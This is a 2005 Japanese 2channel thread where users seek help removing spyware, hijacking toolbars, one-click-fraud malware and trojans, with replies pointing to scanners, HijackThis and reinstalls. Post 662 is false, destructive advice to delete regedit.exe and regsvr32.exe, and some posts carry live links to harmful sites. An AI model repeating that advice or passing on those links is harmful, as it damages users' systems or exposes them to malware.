566 :ひよこ名無しさん:2005/08/23(火) 02:34:00 ID:???
>>565
もっ回取得

567 :557:2005/08/23(火) 10:15:10 ID:???
>>566

ノートンの検疫から戻したら、消えた分だけがログに戻ってジェーンの画面はそのまま。

ジェーンを再起動してもそのまま・・・ (_△_;〃 ドテッ!

今朝 鯖マデオツカイで取得したら ( ̄0 ̄)/ オォー!! 元に戻ってますた。

ありがd


568 : ◆N9P3SuvBPo :2005/08/23(火) 19:12:43 ID:???
>557
遅れましたけど、とりあえずですが
自分の場合、誤って削除してしまいましたが、今のところネットサーフィンするに
あたって不具合は出ていません。
>42の1つめのは、spy-botの免疫で復活できます。

>これと同じファイルが SYSTEM32 にありましたが これは違うのでしょうか?
XPならSYSTEM32がデフォルト

>システムの復元(セーフモードでも)失敗に終わる
これは!?
ちと、マズイっぽいか。

569 :ひよこ名無しさん:2005/08/23(火) 19:54:54 ID:???
:::::;::::          ヽ       ノ  │
:::::::::             ̄-   - ̄ .  │
:::::::                 ̄ ̄      │
::::::           ミミミミミミミ   ミミミミミ│
::::    ───〓──────〓〓─────〓
 ── ̄ ̄     │/ ̄●\ /  │〆 ̄●ヽ  │
ヽ        ⌒⌒\ヽ───ノ /│ │───> .│
ヽ          〆   ̄ ̄ ̄ ̄ │ │ \──/
 \.                   │  │     │         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 │  ..                     │    │        /
 .│  . .            ─/     ヽ    /      <  ホームラン級のバカだな
  │            /   \⌒\  ノ\ . /        \
\/ヽ          /             \. /          \
   │\     │  │ <── ̄ ̄ ̄──). /             ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   │ ヽ    │  \  \++++++/ /
   .│       \     \────/  /
   /   \          (────ノ  /
  /│    \                . /\
 / │      \      <──── /│\
ノ  │        \           / │ \
   │          \        /  │  \
   │             ̄ ̄ ̄ ̄    │    ̄\──

570 : ◆N9P3SuvBPo :2005/08/23(火) 19:59:04 ID:???
554の実験結果報告まだか?

571 :ひよこ名無しさん:2005/08/23(火) 20:16:48 ID:???
>>570


     /ヽ                 
     /   .ヽ               /.゙、
   /     ゙、             ,/`   ヽ
  ,/`      ヽ           ,/     .ヽ
  ,:'         ゙l             /゙   、   ヽ
.,,:'          一--.-,,,,,,,、 ,/  .,,i´     ヽ
,:'    _,、-‐、、、         `"   .,/       ヽ
/    -゛.__ ○ ヽ            ‘''ヽ、      ゙i、
l゙    `^ `゙''-、!               ゜       ゙l,
|         `        ,-''''"''ヽ、          |
!      、           ´…-、○ ヽ            |
!     .|ヽ              ゙ヽ .|          l゙
゙,     | `'-,_             `          l゙
゙l     .l゙   `"―---、、---ー フ             l゙   
ヽ    ヽ +             ,,′               l゙  プギャーーーッ
  `-    \,_   + + _,,/`          ,"
    `'、、    `"…、--ー‐″           ,,/′
      \::     / ̄ ̄^ヽ         丿
             l      l
       _ /,--、l       ノ
   ,--、_ノ:: `ー'::   、ミー---‐,,l
  ,/   :::         i ̄ ̄  |
/          l:::    l:::    l
l   .   l     !::    |:::    l
|   l   l     |::    l:      l
|   l .   }    l:::::,r-----    l
ヽ  :l::::   ト:;;;;;;;/-/__...........  /

572 :ひよこ名無しさん:2005/08/23(火) 21:51:38 ID:???
>>570
予想としては?

573 : ◆N9P3SuvBPo :2005/08/23(火) 22:53:27 ID:???
>572
そうだな、やっぱりわからん。

574 :557:2005/08/24(水) 00:21:13 ID:???
>>568

レス有難う御座います。
不具合はありませんか・・・ 
当方もアイコンがないのはいいのですが 地図が見られないのは一寸いたい。

> 1つめのは、spy-botの免疫で復活できます。
これは免疫化をやり直せばいいってことですかね。

>XPならSYSTEM32がデフォルト
ということは、全部消された訳ではないということですね。
SYSTEMのフォルダに 戻したのは意味のないことですねぇ。

>ちと、マズイっぽいか。
そうなんです 最近ブラウジング中にシステムがフリーズするので、なにかスパイウエアが居るのかとついあれを消してしまいました。

とりあえず様子を見て 必要ならばリカバリーすることにします。

575 :ひよこ名無しさん:2005/08/24(水) 03:46:39 ID:LOjjXG8W
http://free1.bokenya.jp/index.php3

変なんインストールしてしまった・・・
安全だよなぁ?安全って言ってくれ

576 :ひよこ名無しさん:2005/08/24(水) 03:52:33 ID:???
>>575
ttp://free1.bokenya.jp/whatsrss.html

烈しく有害なツールバー

577 :575:2005/08/24(水) 04:02:51 ID:LOjjXG8W
うわぁああ、助けてください(つД`)・゚・

578 :ひよこ名無しさん:2005/08/24(水) 04:04:44 ID:???
>>577
パソコン持って逃げろ。

579 :ひよこ名無しさん:2005/08/24(水) 04:05:11 ID:???
とりあえず、ウィルススキャン、スパイウェアスキャンしてみたらどうよ?

580 :575:2005/08/24(水) 04:06:24 ID:LOjjXG8W
>>スパイウェアをスキャンしてシステム復元してみたら大丈夫ですかね・・・


581 :ひよこ名無しさん:2005/08/24(水) 04:09:43 ID:???
とりあえず、スキャンして、結果書け

582 :575:2005/08/24(水) 04:35:24 ID:LOjjXG8W
とりあえず、スパイウェアをスキャンしてシステムを復元しました。
見た目はなんら変化はないですが・・・

583 :ひよこ名無しさん:2005/08/24(水) 04:36:47 ID:???
復元してるなら、おそらく大丈夫だろ。
気になるなら、復元後にもう一回スキャンしとけ。

584 :575:2005/08/24(水) 04:50:18 ID:LOjjXG8W
>>583
安心しました・・・ふぅ

585 :ひよこ名無しさん:2005/08/24(水) 18:14:34 ID:z0Wp2ag2
誘導されたので、教えて下さい。
Windows XP使っています。
ISTbarというスパイウエアらしきものがXcleanerで検出されました。プログラムの削除でアンインストールしてもセーフモードで削除しても、
再起動するとまた検出されてしまいます。何度やってもダメです。
てんぷれを実行してみましたが、再起動するとやはり検出されます。
ウイルスバスターを入れていますが、スパイウエア検索機能がエラーで実行できません。
ネットで調べてみたけどわかりません。
どなたか削除方法等、教えて下さい。

586 :ひよこ名無しさん:2005/08/24(水) 18:25:26 ID:???
>>585
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

587 :ひよこ名無しさん:2005/08/24(水) 18:26:35 ID:???
>>585
テンプレの実行内容とその結果をもっと具体的に書け。

588 : ◆N9P3SuvBPo :2005/08/25(木) 18:35:38 ID:???
なんか、Windows2000/WindowsXPのレジストリエディタに、長い名前のキーが表示されない。
という不具合が見つかったっていうニュース記事を見つけたんだけど。

589 :ひよこ名無しさん:2005/08/25(木) 23:14:57 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/


590 :ひよこ名無しさん:2005/08/25(木) 23:44:42 ID:???
やってこい ちきゅうをあらす しんにゅうしゃ

591 :ひよこ名無しさん:2005/08/26(金) 00:12:56 ID:???
おばかがね またまたひとり やってきた

592 :ひよこ名無しさん:2005/08/26(金) 12:59:54 ID:???
そのおばか おれのことかと >590言い

593 :ひよこ名無しさん:2005/08/27(土) 01:04:36 ID:???
とうぜんさ いわれなくても きづくだろ

594 :ひよこ名無しさん:2005/08/27(土) 01:07:53 ID:???
ああ俺ね そんな気すこし していたさ

595 :ひよこ名無しさん:2005/08/27(土) 01:37:57 ID:???
すこしかよ ふつうはすぐに きづくだろ

596 :ひよこ名無しさん:2005/08/27(土) 01:44:11 ID:???
気取らせて おくれよすこしの 間だけ

597 :ひよこ名無しさん:2005/08/27(土) 02:11:53 ID:???
きどらせて やろうというと おもったか

598 : :2005/08/27(土) 03:27:38 ID:xJ5PlhFO
あげ

599 :ひよこ名無しさん:2005/08/27(土) 03:30:16 ID:???
                      、、, , , , , , ,
      / ̄ ̄ ̄ ̄\       、/; ̄', ̄', ̄',\,
   ./ /フ          ヽ       、/、` 、 ' '  , ' ", X
   / o~  _     ___  |     ソ、゙ `        ' "|
   |    / ゚ ヽ  / ゚ ヽ |     |゙ ゙   /⌒ヽ  /⌒l |
  ,--、  `ー〜'  `ー〜 /    ,--、     ・ `ー' ・   /
 ( 6   i―┬┬┬┬i 〈     ( 6  i‐―┬―┬‐; 〈
   ̄l   \_,二_二ノ ノ       ̄l、 \ ,二二、ノ ノ
    _\_  ̄ ̄ ̄_,/       _\_  ̄ ̄ ̄_,/
  ./  \ ̄7ヾ~~7 \     ./::::lll::/|~7ヾ~|ヽ::\
  |  /⌒ヽVl_lV  /⌒ヽ   |:::::::::lll::> Vl^lV<::|:::|
  |、 / ー'ー'  / |   | ー'ーf   |:::::::::|::::::\ヾV/./::|::::|
  ヾニニニソ  .| |   |ニニソ    |:::::::::|:::日:::\l/日:|::::|

600 : ◆wG1CV58ydQ :2005/08/27(土) 03:35:58 ID:???
600

601 :ひよこ名無しさん:2005/08/27(土) 13:00:22 ID:xJ5PlhFO
http://c-au.2ch.net/test/-/warhis/1124626348/529-532

すみません。
ここのスレに書いてあるアドに飛んだら、デスクトップのアイコンが増えていて、テンプレの作業をして、>>2の(3に書いてあるソフトを使って無事削除出来ました。


ですが、一つ心配なことがあるのです…
料金請求とかされたりしませんよね?
なんか、そういう画面は出てこなかったのですが、少し心配になって;

お時間あったら、どなたかお答え下さい

602 :ひよこ名無しさん:2005/08/27(土) 13:38:08 ID:pVO4SnTD
http://www.picsplace.com/sexy/

IEが勝手に起動して上のページに飛んでしまいます。
それにダウンロードもしていないのにIEに変なツールバーがついてます。
RemoveToolbarって書いてます。
消す方法はないでしょうか?
アダルトサイトなのでこまります。

603 :ひよこ名無しさん:2005/08/27(土) 14:32:22 ID:???
>>602
消す方法ないよ

604 :ひよこ名無しさん:2005/08/27(土) 14:49:10 ID:DgHa/jZo
>>604
そんなこと言わずに答えてやれよ。
本気で困ってるんだろうし…

605 :ひよこ名無しさん:2005/08/27(土) 14:51:17 ID:???
すげぇや。ポップアップしたら無限ループして
責任逃れしてるように見える

606 :ひよこ名無しさん:2005/08/27(土) 14:53:13 ID:???
>>602
ここを見るといい。

ttp://www.higaitaisaku.com/fswiki/wiki.cgi?page=Remove+Toolbar%A4%CE%C2%D0%BD%E8%CB%A1
RemoveToolbarの対処法

607 :ひよこ名無しさん:2005/08/27(土) 14:56:40 ID:???
>>602
ttp://www.higaitaisaku.com/fswiki/wiki.cgi?page=Remove+Toolbar%A4%CE%C2%D0%BD%E8%CB%A1
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1563674

('A`)つ【Google】

608 :ひよこ名無しさん:2005/08/27(土) 14:57:24 ID:DgHa/jZo
>>601
最初に料金制だと明記してないのに、たとえ請求書がきたとしても、払う必要はなし
つか、住所も何も書いてないのに請求書が来るはずな(ry

609 :ひよこ名無しさん:2005/08/27(土) 17:46:21 ID:???
>>601
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-――'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

610 : ◆N9P3SuvBPo :2005/08/27(土) 19:31:18 ID:???
禁断のテンプレ完成しただけど、実験バージョンとして次貼っていい?
もちろん>>16の後、起動しなくなるの注意書きも加えるので。

611 :ひよこ名無しさん:2005/08/27(土) 22:27:15 ID:???
何でそんなの作ってるの?

612 :ひよこ名無しさん:2005/08/27(土) 22:41:16 ID:DqGn85zy
http://www.grannymax.com/index1.shtml
ここを踏んでしまいました
今のところ目に見えての被害はないのですが、もうウィルスに進入されてしまっているのでしょうか

OS XP sp2
ブラウザ Mozilla firefox
セキュリティーソフト nod32 zonealarm


613 :ひよこ名無しさん:2005/08/27(土) 22:41:52 ID:???
>>612
直リンするな! 氏ね!

614 :ひよこ名無しさん:2005/08/27(土) 22:43:07 ID:???
>>612
ウィルススキャンしなさい。

615 :612:2005/08/27(土) 22:43:19 ID:DqGn85zy
h抜くの忘れました
すみません・・・

616 :ひよこ名無しさん:2005/08/27(土) 23:23:21 ID:???
>>615
おろかもの!

617 :ひよこ名無しさん:2005/08/27(土) 23:33:16 ID:D920NJlV
お忙しい所すみません
http://tv8.2ch.net/test/read.cgi/ana/1125146063/l50
↑このスレに
VIPPER参上
と、書き込みをしていただきたいのですが
時間がありましたらお願いいたします

618 :612:2005/08/27(土) 23:38:14 ID:DqGn85zy
スキャンしましたがウィルスは発見されませんでした。
鑑定すれでは
ブラクラ並みにブラウザが次々に開いてノーdが大量にウィルス検出。しかもゾンビウィンドウ
ぢゃ、消しても消しても増える一方ぢゃったわい。激しく有害につき、踏むではないぞ。
と書いてあり自分が踏んだときはブラウザが開くこともなくnod32のamonは無反応でした。
mozilla firefoxのjavaは有効になってました。


619 :ひよこ名無しさん:2005/08/27(土) 23:41:29 ID:???
>>618
じゃあ運が良かったんだろ、よかったな。

620 :ひよこ名無しさん:2005/08/27(土) 23:45:24 ID:???
>>618
そのサイト、IEが最新のものなら全くの無害だんべ

621 :612:2005/08/28(日) 00:12:37 ID:KhK42y00
そうですか、安心しました。
有難う御座いました。

622 :ひよこ名無しさん:2005/08/28(日) 00:20:10 ID:???
あい。

623 :ひよこ名無しさん:2005/08/28(日) 03:44:14 ID:oKluTlh0
先日、初心者スレで質問しましたところ、こちらへ誘導されました。
テンプレを読み実行しましたがもう手には負えないのでどうかよろしくお願いします。
読みにくい部分や、おかしな表現があるかもしれません。
OSの種類:Windows ME
ブラウザ :わかりません
せキュソフトの有無:感染前は何もしていません
トロイの木馬に感染していたことに、テンプレ実行中に気が付きました。
以下テンプレ実行結果です。
1と2:問題なく出来ました。3:ファイルが存在しませんと出ます。
4:何が追加されたかわからないためいじっていません。
56:いろいろやってしまいこんがらがってます。
ソフォスはインストールできませでした。
ウイルスバスターはインストールできましたが、ウイルスの削除ができません。
7:ここのサイトを見つける前にSpybot使用しました。
  Adwareはまだ試していません。
8:やってみましたが、ウィルス削除できませんでした。
  その後、復元ポイントの破壊という作業をしています。
先ほど、Hijackthisをインストールしました。
全部貼っていけばいいですか?
他力本願で申し訳ないのですが、どなたかに指示していただければと
切に願います。よろしくお願いします。


624 :ひよこ名無しさん:2005/08/28(日) 03:51:21 ID:???
>>623
トロイの木馬の名前は?

625 :623:2005/08/28(日) 03:52:49 ID:oKluTlh0
続きです。
ウィルスバスターで手動削除を実行したのですが、
HOSTSファイルが見つかりませんでした。
その他、いろいろいじっています。

626 :623:2005/08/28(日) 04:00:31 ID:oKluTlh0
>>624
レスありがとうございます。
ウィルスバスターで検索すると61種類でてくるのですが
全部違うものですか?
Troj/Dloader−MKというものです。
その他にTroj以降の文字が違うものが多々あります。



627 :ひよこ名無しさん:2005/08/28(日) 04:04:29 ID:???
>>626
http://okweb.jp/kotaeru.php3?q=1572460

628 :623:2005/08/28(日) 04:22:51 ID:oKluTlh0
>>627
ありがとうございます。
書かれているのと同じ警告文が数日前まで出ていました。
ウィルスが削除されたわけじゃないのに、今は出てこなくなりました。
ちょっと不信感があります。これは気にしなくていいのでしょうか?


629 :ひよこ名無しさん:2005/08/28(日) 11:21:55 ID:???
ttp://ur.ur.to/picbbs/img/1024.gif
ttp://ur.ur.to/picbbs/img/1101.jpg

630 :ひよこ名無しさん:2005/08/28(日) 13:00:24 ID:???
>>629
わろす。特に上。

631 :623:2005/08/28(日) 14:05:01 ID:oKluTlh0
>>627
貼って頂いたサイト内を見ながら再度駆除を行いました。
うまく出来なかったので、こちらにもう一度質問させていただこうと思い
その前に試しにウィルスバスターとスパイボットを実行したところ
両方とも問題なしの結果が表示されました。
これは完全にトロイの木馬が駆除されたということで間違いないのでしょうか?
どうしても不安なので、お答えよろしくお願いします。

632 :ひよこ名無しさん:2005/08/28(日) 14:10:59 ID:???
>>631
そんなに不安ならバックアップとってリカバリしろ

633 :623:2005/08/28(日) 15:09:03 ID:oKluTlh0
>>632
レスありがとうございます。
リカバリですが、このパソコンは中古で購入しました。
その際にCD類はソフトウェア(家計簿やゲームなど)のものしか
付いていなかったのですが、リカバリを行うには別途に専用のCDが
必要なんですよね?

634 :ひよこ名無しさん:2005/08/28(日) 15:11:30 ID:???
>>633
PCのメーカーと型番は?

635 :ひよこ名無しさん:2005/08/28(日) 15:11:53 ID:???
>>633
パソコンによって違う。
最近はHDDリカバリ方式がほとんど。

636 :ひよこ名無しさん:2005/08/28(日) 15:13:06 ID:???
へえー  Meの時代にねぇ・・・

637 :623:2005/08/28(日) 15:29:23 ID:oKluTlh0
>>634
PCのメーカーは富士通で、型番はT0504−025
と書いてあります。
商品名はFMV−650NU7C/L となってます。
>>635
PCによって違うのですね。
全然知りませんでした。

>>631の追加レスです。
SOPHOSはダウンロードは出来ましたがインストールが出来ません。
Nortonも同じく出来ませんでしたので、ウィルスバスターの結果を
疑問に思ったしだいです。


638 :ひよこ名無しさん:2005/08/28(日) 15:47:51 ID:???
>>637
買ったパソコンもともとのOSは何だったかわかる?
95か98で前の持ち主がMEに変えたからリカバリCDないとか?

639 : ◆N9P3SuvBPo :2005/08/28(日) 15:48:18 ID:???
>637
最終的には、セーフモードでANTIDOTE(簡易版)でドライブの全スキャンを行なって、
それで何も検出が無ければほぼ大丈夫ということになるんだけどな。

640 :ひよこ名無しさん:2005/08/28(日) 15:50:35 ID:???
>>637
正式型名FMV7NUHLCに続く数字によって、標準OSは95/98/NT4/2000のどれか。
MEは前の所有者か販売者が独自に入れたものと思われる。
リカバリCDはもともと存在しないので、単体OSのCDが付属してなければ、
不正コピー品ということになる。

641 :ひよこ名無しさん:2005/08/28(日) 16:08:08 ID:???
                      、、, , , , , , ,
      / ̄ ̄ ̄ ̄\       、/; ̄', ̄', ̄',\,
   ./ /フ          ヽ       、/、` 、 ' '  , ' ", X
   / o~  _     ___  |     ソ、゙ `        ' "|
   |    / ゚ ヽ  / ゚ ヽ |     |゙ ゙   /⌒ヽ  /⌒l |
  ,--、  `ー〜'  `ー〜 /    ,--、     ・ `ー' ・   /
 ( 6   i―┬┬┬┬i 〈     ( 6  i‐―┬―┬‐; 〈
   ̄l   \_,二_二ノ ノ       ̄l、 \ ,二二、ノ ノ
    _\_  ̄ ̄ ̄_,/       _\_  ̄ ̄ ̄_,/
  ./  \ ̄7ヾ~~7 \     ./::::lll::/|~7ヾ~|ヽ::\
  |  /⌒ヽVl_lV  /⌒ヽ   |:::::::::lll::> Vl^lV<::|:::|
  |、 / ー'ー'  / |   | ー'ーf   |:::::::::|::::::\ヾV/./::|::::|
  ヾニニニソ  .| |   |ニニソ    |:::::::::|:::日:::\l/日:|::::|

642 :623:2005/08/28(日) 16:17:28 ID:oKluTlh0
>>638
もともとのOSが何だったのかはわかりません。
今の今までMEだと思っていました。
購入したときに頂いたCDを確認したところ、ソフトが4枚と
Microsoft Windows meと書いてある 
金と銀の二枚組みのCDがありました。
>>639
もう少しいろいろ試してみて、最終的にはその方法を行いたいと思います。
セーフモードでの立ち上げはわかるのですが
その後のやり方を詳しく教えて頂けませんか?
>>640
商品区分・商品名の他に商品Noの記載があります。
201G−0504−4233です。
そういえば、購入したときに店員の方が何かをインストールしていました。
そのときは気にも留めなかったのですが、帰宅後に開けてみると
白いCDにサインペンでWindows MEと書いてありました。
単体OSのCDとはそれでしょうか?
不正コピー品というのはOSがWindowsのものではないってことですよね?
もしそうなら、無知だったとはいえ悲しい

643 :ひよこ名無しさん:2005/08/28(日) 16:20:29 ID:???
>>642
普通に考えれば、その金と銀のCDがOSじゃないの?

644 :ひよこ名無しさん:2005/08/28(日) 16:22:09 ID:???
>>643
禿同
っていうかそれだろ多分。

645 :ひよこ名無しさん:2005/08/28(日) 16:23:43 ID:???
金と銀のCD・・・
まさか・・・
http://pc.watch.impress.co.jp/docs/2003/0401/uocchi/ms2.htm

646 :ひよこ名無しさん:2005/08/28(日) 16:25:25 ID:???
マックロソフト Windous XP・・・・・!!!!!

647 :ひよこ名無しさん:2005/08/28(日) 16:28:18 ID:???
WindousXP キタ━━━━━(゚∀゚)━━━━━!!!!

648 :ひよこ名無しさん:2005/08/28(日) 16:32:12 ID:???
Windousはいろいろな欠陥があるみたいだから注意!
http://internet.watch.impress.co.jp/static/uocchi/2004/04/01/ms.htm

649 :623:2005/08/28(日) 16:48:53 ID:oKluTlh0
>>643 >>644
このCDは密封された状態で頂きました。
ということは別のCDを使ってMeをインストールした。
ので、不正品ではない。しかし、もともとがMeではないので
リカバリするとMe以前のOSになるってことですかね?

650 :ひよこ名無しさん:2005/08/28(日) 16:58:10 ID:???
>>649
リカバリCDは付属してないみたい。
自作PCと同じようなOSインストール作業になる。
その機種用のドライバをインターネットでダウンロードする必要がある。

651 :Mr.ken:2005/08/28(日) 17:37:15 ID:0QWi61dv
俺VAIOのノート持ってるんだけど使いかたがよくわかりません??? 教えてください(>〜<)               

652 :ひよこ名無しさん:2005/08/28(日) 17:39:24 ID:???
>>651
エロスレとどういう関係が?

653 :ひよこ名無しさん:2005/08/28(日) 17:40:01 ID:???
>>651
おかんに聞くでし
あい

654 :ひよこ名無しさん:2005/08/28(日) 19:56:57 ID:EaOdYIbN
すいませんブラクラ ニュースストームというのを踏んでしまいました
どういったやつか教えて下さい
パソコンがバグってる間に回線抜いて電源を切りました
ちなみに再度パソコンをつけたら普通に問題なく起動できます
OSはXpでマカフィーってソフト入れてます
超初心者ですいませんがどうか教えて下さい

655 :ひよこ名無しさん:2005/08/28(日) 20:07:38 ID:???
>>654
>>1のテンプレをやってみること。
だいじょうぶだったら大丈夫。
ブラクラの種類を知ってもしょうがないし・・・

656 :ひよこ名無しさん:2005/08/28(日) 20:15:29 ID:???
>>655
1のテンプレとは>>2-10あたりに貼ってある事でしょうか?

657 :ひよこ名無しさん:2005/08/28(日) 20:16:38 ID:???
>>656
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ まず、テンプレの>>2-10あたりを必ず読む。

658 :654:2005/08/28(日) 20:18:29 ID:???
ありがとうございます


659 :623:2005/08/28(日) 21:15:53 ID:oKluTlh0
>>649
ありがとうございます。
探してみます。
質問にお答えいただいた皆様ありがとうございました。
レスいただけて、とても嬉しかったです

660 :623:2005/08/28(日) 21:19:06 ID:oKluTlh0
間違えました。
>>649ではなく、>>650です。

661 :ひよこ名無しさん:2005/08/28(日) 21:22:24 ID:???
>>660
あい

662 :ひよこ名無しさん:2005/08/29(月) 00:49:44 ID:???
c:\windows\regedit.exeまたはc:\winnt\regedit.exe
↑はウイルスに悪用される可能性のあるファイルです!!
被害防止のために削除してください!!
ついでにregedt32.exeとregsvr32.exeも同様に削除して下さい!!
被害拡大防止にご協力ください!!

663 :ひよこ名無しさん:2005/08/29(月) 01:11:56 ID:???
>>662
ソースは?w

664 :ひよこ名無しさん:2005/08/29(月) 10:27:30 ID:???
トラップにひっかけられてスパイウェアがついちゃってAdとbotいれてスキャンしてみたけど、coolseachとかにちゃんと反応しないよ。どうすればいいのかな?ちなみにosは2000です。

665 :ひよこ名無しさん:2005/08/29(月) 10:33:08 ID:???
>>664
質問はID出してください

666 :ひよこ名無しさん:2005/08/29(月) 10:37:04 ID:???
>>663
質問はID出してください

667 :663:2005/08/29(月) 11:49:15 ID:cQnqlUBS
あっ、すいません。一応テンプレに書いてあったことは試してみました。あとセーフモードでソフトを使って駆除かけたりしました。設定ができてないでしょうか?

668 :ひよこ名無しさん:2005/08/29(月) 14:41:55 ID:DNzFx+bD
誘導されました。
ノートパソコンを起動したらいきなり「エロ画像」&「警告」が出てきました。
警告には「番組利用料金のご利用料金の入会の確認が取れておりません」と書かれています。
調べてみたところ、どうも弟がこのサイト http://www.vivit-sm.com/ でワンクリック詐欺に遭ったようです。
遭っただけならいいんですけど、エロ画像&警告が消えません。
弟はリビングで寝てます。親が帰ってくる前に何とかしときたいので消し方を教えてください。

669 :【沈黙-ω-】 ◆.0e0wEv5W6 :2005/08/29(月) 14:44:16 ID:OSjCe26o ?###
弟ってwwwもっとマシなウソをつけよwwwm9(^Д^)プギャー

670 :ひよこ名無しさん:2005/08/29(月) 14:55:34 ID:DNzFx+bD
嘘じゃないです。とにかく消し方を教えて下さい。
再起動しても消えません。次から次へと出てきます。

671 :ひよこ名無しさん:2005/08/29(月) 15:01:45 ID:???
ブラウザが立ち上がるのか

672 :ひよこ名無しさん:2005/08/29(月) 15:02:21 ID:???
警察に自首するのが先じゃねーのか?
弟とやらは永遠に寝てるんだろ?(´ー`)y−~~~

673 :ひよこ名無しさん:2005/08/29(月) 15:02:25 ID:???
>>670
リカバリ。
てか直りんしないで

674 :ひよこ名無しさん:2005/08/29(月) 15:04:49 ID:???
>>670
煽りは放置しろよ。
回答者の立場から言わせてもらうと、本人だろうが弟だろうがこっちには関係ないから余計なこと書かんでよろしい。
で、質問の回答だが、おそらくブラウザハイジャッカー系のアドウェアだろう。
テンプレにあるAd-AwareとSpybotをDLしてスキャンしてみろ。

675 :ひよこ名無しさん:2005/08/29(月) 15:06:56 ID:???
ついでに>>554もやってやれ。

676 :ひよこ名無しさん:2005/08/29(月) 15:09:39 ID:DNzFx+bD
リカバリーとは初期化のことですか?

677 :ひよこ名無しさん:2005/08/29(月) 15:10:22 ID:???
>>676
うん。工場出荷時と同じになる

678 :ひよこ名無しさん:2005/08/29(月) 15:11:25 ID:DNzFx+bD
>>674 どうも

679 :ひよこ名無しさん:2005/08/29(月) 15:16:59 ID:???
>>678
親が帰ってくる前に回復したいんならリカバリが手っ取りばやくね?
ついでにすっきりするし

680 :ひよこ名無しさん:2005/08/29(月) 15:17:48 ID:???
リカバリーが親が帰ってくるまでに出来上がるわけがない

681 :ひよこ名無しさん:2005/08/29(月) 15:19:08 ID:???
警告ってどうやってででくるんだよ。
サイトいってみたげど何も出てこない
別のとこだろ

682 :ひよこ名無しさん:2005/08/29(月) 15:19:23 ID:???
俺一時間かからないぞ。

683 :ひよこ名無しさん:2005/08/29(月) 15:21:53 ID:???
658 名前:ひよこ名無しさん[] 投稿日:2005/08/29(月) 15:13:31 ID:OSjCe26o BE:162641287-###
DVDドライブ等を取り替えるのにパソコンの分解は不可避ですが、
それは容易なことなのでしょうか?
また、詳しく解説しているサイトがありましたら教えてください。

662 名前:ひよこ名無しさん[] 投稿日:2005/08/29(月) 15:20:07 ID:OSjCe26o BE:60991237-### New!
>>660
もらい物なんで、あいにくマニュアルは所持してないんです
それでご教授願おうかと思ったのですが・・・

>>661
キューブ型なんですが、分解は困難ですか?

684 :ひよこ名無しさん:2005/08/29(月) 15:25:17 ID:???
>>681
ブラウザは?

685 :ひよこ名無しさん:2005/08/29(月) 15:46:52 ID:uj9fnYFt
はじめまして、インターネットしてると突然身に覚えのないアダルトサイト
が出てきて困ってます。http://www.movie-revolution.com/6/index2.php
なにか隠れたソフトでもダウンロードしてしまったのでしょうか。
対策お願いします。

686 :ひよこ名無しさん:2005/08/29(月) 15:48:27 ID:???
>>685
で、そのリンクは何?

687 :ひよこ名無しさん:2005/08/29(月) 15:55:42 ID:uj9fnYFt
>>686
リンクってどこ見れば分かるんですか?

688 :【沈黙-ω-】 ◆.0e0wEv5W6 :2005/08/29(月) 15:59:18 ID:OSjCe26o ?###
これは釣り

689 :ひよこ名無しさん:2005/08/29(月) 16:04:56 ID:???
>>685に載っているURLは何のサイトですか?

690 :ひよこ名無しさん:2005/08/29(月) 16:15:58 ID:iGltmVfT
ついに達成 日本縦断
【バカMVP】http://blog.liveoor.jp/bmvp/
感動をありがとう 丸山弁護士なんて目ジャネ

691 :ひよこ名無しさん:2005/08/29(月) 16:19:46 ID:???
>>685
>>674

692 :ひよこ名無しさん:2005/08/29(月) 16:20:16 ID:???
>>690
だからさぁ鯖見つからなくて見れないんだって。

693 :ひよこ名無しさん:2005/08/29(月) 16:30:23 ID:wau2rz3u
>>668
そのワンクリウェアは、ewidoが対応しているから、
ewidoをインスコしてフルスキャン。たぶん、それだけで直る。

直らないorOSが98やMEなどでインスコできない場合は、以下の方法で手動削除。
1)タスクマネージャを起動。aebauernub93874w.exeとaebauernub93874s.exeの
プロセスを「プロセスツリーの終了」で停止させる。
2)以下のページを参考にして、Windowsフォルダ内の当該ファイル2つを削除。
ttp://www.geocities.jp/oneclicktrojan/delete/binjo.html
3)HijackThisでO4にあるaebauernub93874をfix。
分からない言葉とかツールは、自分でググって調べてね。

ところで、このスレに限らず、書き込むときは、テンプレくらい読もうね。

694 :693:2005/08/29(月) 16:34:47 ID:wau2rz3u
書き忘れてたが、
ewidoは検出力高い半面、ときどき誤検出もあるから、
明らかに関係なさそうなものが検出されたときは削除しないほうがいい。
まあ、間違って削除しても、あとから戻せば済む話だが

695 :ひよこ名無しさん:2005/08/29(月) 16:55:00 ID:CircTkxN
>>689

アダルトサイトです

696 :ひよこ名無しさん:2005/08/29(月) 17:00:30 ID:???
>>695
ありがとん。
ぷららさんが勝手に見れないようにフィルターにかけちゃってて見れませんでした。

697 :ひよこ名無しさん:2005/08/29(月) 17:05:25 ID:???
うちもぷららだけど見れるなあ

698 :ひよこ名無しさん:2005/08/29(月) 17:07:31 ID:???
フィルターを解除してないからみれない。
初期設定は無料でフィルターかかってる。

699 : ◆N9P3SuvBPo :2005/08/29(月) 19:11:51 ID:???
嫌なニュース見つけてしまった。
レジストリエディタに不具合があって、長い名前のキーが表示されない。
